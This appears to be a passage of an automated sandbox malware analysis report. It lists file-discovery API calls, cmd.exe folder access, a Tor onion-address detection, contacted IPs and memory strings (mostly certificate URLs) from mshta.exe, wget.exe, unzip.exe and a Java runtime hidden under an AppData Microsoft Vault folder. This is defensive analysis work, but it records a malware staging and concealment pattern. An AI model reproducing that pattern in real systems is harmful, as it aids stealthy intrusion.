Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FB445EF _Java_sun_nio_fs_WindowsNativeDispatcher_FindFirstFile1@24,FindFirstFileW,GetLastError,	19_2_6FB445EF
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD3FA60 _Open_dir,FindFirstFileExW,__Read_dir,FindClose,	19_2_6FD3FA60

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_00423040 GetLogicalDriveStringsA,GetProcessHeap,HeapAlloc,GetLogicalDriveStringsA,

15_2_00423040

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Vault\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\

Networking

Found Tor onion address

Source: mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cG../../lib/libexpat_metalink_parser.c0rbmetalinkhttp://www.metalinker.org/typeoriginurn:ietf:params:xml:ns:metalinkdynamictagsidentityfilesfilenamesizeversionlanguageverificationresourcesmaxconnectionsurltypelocationpreferencehashpieceslengthpiece%Y-%m-%dT%H:%M:%S%H:%MfilenamegeneratororigindynamictruepublishedupdatedurllocationprioritymetaurlmediatypehashtypepieceslengthsignaturepublisherdescriptioncopyrightidentitylogolanguagesizeversionSystem\CurrentControlSet\Services\Tcpip\ParametersDatabasePathr%uudpsctpdccptcp.onion.onion., System\CurrentControlSet\Services\Tcpip\ParametersSearchListDomainSoftware\Policies\Microsoft\Windows NT\DNSClientSoftware\Policies\Microsoft\System\DNSClientPrimaryDNSSuffixSystem\CurrentControlSet\Services\Tcpip\Parameters\InterfacesDhcpDomainLOCALDOMAINRES_OPTIONSndots:retrans:retry:rotatefb
Source: mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cG../../lib/libexpat_metalink_parser.c0rbmetalinkhttp://www.metalinker.org/typeoriginurn:ietf:params:xml:ns:metalinkdynamictagsidentityfilesfilenamesizeversionlanguageverificationresourcesmaxconnectionsurltypelocationpreferencehashpieceslengthpiece%Y-%m-%dT%H:%M:%S%H:%MfilenamegeneratororigindynamictruepublishedupdatedurllocationprioritymetaurlmediatypehashtypepieceslengthsignaturepublisherdescriptioncopyrightidentitylogolanguagesizeversionSystem\CurrentControlSet\Services\Tcpip\ParametersDatabasePathr%uudpsctpdccptcp.onion.onion., System\CurrentControlSet\Services\Tcpip\ParametersSearchListDomainSoftware\Policies\Microsoft\Windows NT\DNSClientSoftware\Policies\Microsoft\System\DNSClientPrimaryDNSSuffixSystem\CurrentControlSet\Services\Tcpip\Parameters\InterfacesDhcpDomainLOCALDOMAINRES_OPTIONSndots:retrans:retry:rotatefb
Source: mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cG../../lib/libexpat_metalink_parser.c0rbmetalinkhttp://www.metalinker.org/typeoriginurn:ietf:params:xml:ns:metalinkdynamictagsidentityfilesfilenamesizeversionlanguageverificationresourcesmaxconnectionsurltypelocationpreferencehashpieceslengthpiece%Y-%m-%dT%H:%M:%S%H:%MfilenamegeneratororigindynamictruepublishedupdatedurllocationprioritymetaurlmediatypehashtypepieceslengthsignaturepublisherdescriptioncopyrightidentitylogolanguagesizeversionSystem\CurrentControlSet\Services\Tcpip\ParametersDatabasePathr%uudpsctpdccptcp.onion.onion., System\CurrentControlSet\Services\Tcpip\ParametersSearchListDomainSoftware\Policies\Microsoft\Windows NT\DNSClientSoftware\Policies\Microsoft\System\DNSClientPrimaryDNSSuffixSystem\CurrentControlSet\Services\Tcpip\Parameters\InterfacesDhcpDomainLOCALDOMAINRES_OPTIONSndots:retrans:retry:rotatefb
Source: mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cG../../lib/libexpat_metalink_parser.c0rbmetalinkhttp://www.metalinker.org/typeoriginurn:ietf:params:xml:ns:metalinkdynamictagsidentityfilesfilenamesizeversionlanguageverificationresourcesmaxconnectionsurltypelocationpreferencehashpieceslengthpiece%Y-%m-%dT%H:%M:%S%H:%MfilenamegeneratororigindynamictruepublishedupdatedurllocationprioritymetaurlmediatypehashtypepieceslengthsignaturepublisherdescriptioncopyrightidentitylogolanguagesizeversionSystem\CurrentControlSet\Services\Tcpip\ParametersDatabasePathr%uudpsctpdccptcp.onion.onion., System\CurrentControlSet\Services\Tcpip\ParametersSearchListDomainSoftware\Policies\Microsoft\Windows NT\DNSClientSoftware\Policies\Microsoft\System\DNSClientPrimaryDNSSuffixSystem\CurrentControlSet\Services\Tcpip\Parameters\InterfacesDhcpDomainLOCALDOMAINRES_OPTIONSndots:retrans:retry:rotatefb
Source: wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: ../../lib/libexpat_metalink_parser.c0rbmetalinkhttp://www.metalinker.org/typeoriginurn:ietf:params:xml:ns:metalinkdynamictagsidentityfilesfilenamesizeversionlanguageverificationresourcesmaxconnectionsurltypelocationpreferencehashpieceslengthpiece%Y-%m-%dT%H:%M:%S%H:%MfilenamegeneratororigindynamictruepublishedupdatedurllocationprioritymetaurlmediatypehashtypepieceslengthsignaturepublisherdescriptioncopyrightidentitylogolanguagesizeversionSystem\CurrentControlSet\Services\Tcpip\ParametersDatabasePathr%uudpsctpdccptcp.onion.onion., System\CurrentControlSet\Services\Tcpip\ParametersSearchListDomainSoftware\Policies\Microsoft\Windows NT\DNSClientSoftware\Policies\Microsoft\System\DNSClientPrimaryDNSSuffixSystem\CurrentControlSet\Services\Tcpip\Parameters\InterfacesDhcpDomainLOCALDOMAINRES_OPTIONSndots:retrans:retry:rotatefb

Source: Joe Sandbox View	IP Address: 52.113.194.132 52.113.194.132
Source: Joe Sandbox View	IP Address: 23.56.162.204 23.56.162.204
Source: Joe Sandbox View	IP Address: 23.219.161.132 23.219.161.132

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe

Code function: 16_2_6D52BD40 _JVM_RecvFrom@24,

16_2_6D52BD40

Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: HTTP://WWW.CHAMBERSIGN.ORG
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf
Source: javaw.exe, 00000013.00000002.3219812687.0000000005136000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3207249601.0000000016294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.00000000051BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.00000000051BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3207249601.0000000016294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.00000000051BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9BB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000010.00000002.3207249601.0000000016294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com
Source: javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216468413.00000000078AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198882211.00000000078C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9BB000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
Source: javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlKP
Source: mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198882211.00000000078C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: mshta.exe, 00000000.00000003.2244222939.00000000078AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216529720.0000000007891000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217974859.00000000078AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATime
Source: mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216370998.00000000078C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000010.00000002.3202598403.000000000A91F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3207249601.0000000016294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.00000000051BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.00000000051BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3207249601.0000000016294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.00000000051BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198882211.00000000078C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216370998.00000000078C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216468413.00000000078AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: javaw.exe, javaw.exe, 00000010.00000002.3202598403.000000000A564000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3209774475.000000006FD16000.00000002.00000001.01000000.00000012.sdmp, javaw.exe, 00000013.00000002.3226266590.000000006FD16000.00000002.00000001.01000000.00000012.sdmp, javaw.exe, 00000013.00000002.3219812687.0000000005136000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000013.00000002.3220800767.000000000A5CD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000010.00000002.3209774475.000000006FD16000.00000002.00000001.01000000.00000012.sdmp, javaw.exe, 00000013.00000002.3226266590.000000006FD16000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: http://java.oracle.com/java.vendor.url.bughttp://bugreport.sun.com/bugreport/%d.%djava.class.version
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://netpreserve.org/warc/1.0/revisit/identical-payload-digest
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://netpreserve.org/warc/1.0/revisit/identical-payload-digestWARC-Truncatedlengthapplication/http
Source: javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3207044838.0000000015AE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://null.oracle.com/
Source: mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216468413.00000000078AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198882211.00000000078C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com
Source: javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3207249601.0000000016294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.00000000051BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3207249601.0000000016294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.00000000051BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000010.00000002.3202598403.000000000A82E000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A75B000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.00000000051BD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: mshta.exe, 00000000.00000003.2202654128.000000000D524000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216370998.00000000078C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216468413.00000000078AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000CED8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198917590.00000000078BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201777178.000000000DB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2198882211.00000000078C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2201921377.0000000007891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://openjdk.java.net/jeps/220).
Source: javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/3x
Source: javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/SL
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/kh
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3197189783.0000000005000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/s
Source: javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000010.00000002.3197189783.0000000005336000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000010.00000002.3202598403.000000000A9E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.gnu.org/licenses/gpl.html
Source: mshta.exe, 00000000.00000002.2247961132.000000000DB4E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217308169.000000000C92C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216211143.000000000DA21000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217394546.000000000DB6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217427897.00000000029BE000.00000004.00000020.00020000.00000000.sdmp, unzip.exe, 0000000F.00000000.3048897634.000000000043A000.00000008.00000001.01000000.0000000C.sdmp, unzip.exe, 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.info-zip.org/UnZip.htmlDVarFileInfo$
Source: mshta.exe, 00000000.00000002.2247961132.000000000DB27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2217308169.000000000C92C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2216211143.000000000DA21000.00000004.00000020.00020000.00000000.sdmp, unzip.exe, 0000000F.00000000.3048871065.0000000000401000.00000020.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.info-zip.org/zip-bug.html;
Source: mshta.exe, 00000000.00000003.2199936338.000000000D8B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2202654128.000000000CFD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2183541360.000000000C98A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2182281973.000000000C98C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2203539288.000000000C13C000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 0000000B.00000000.2222201108.0000000000B9E000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.metalinker.org/
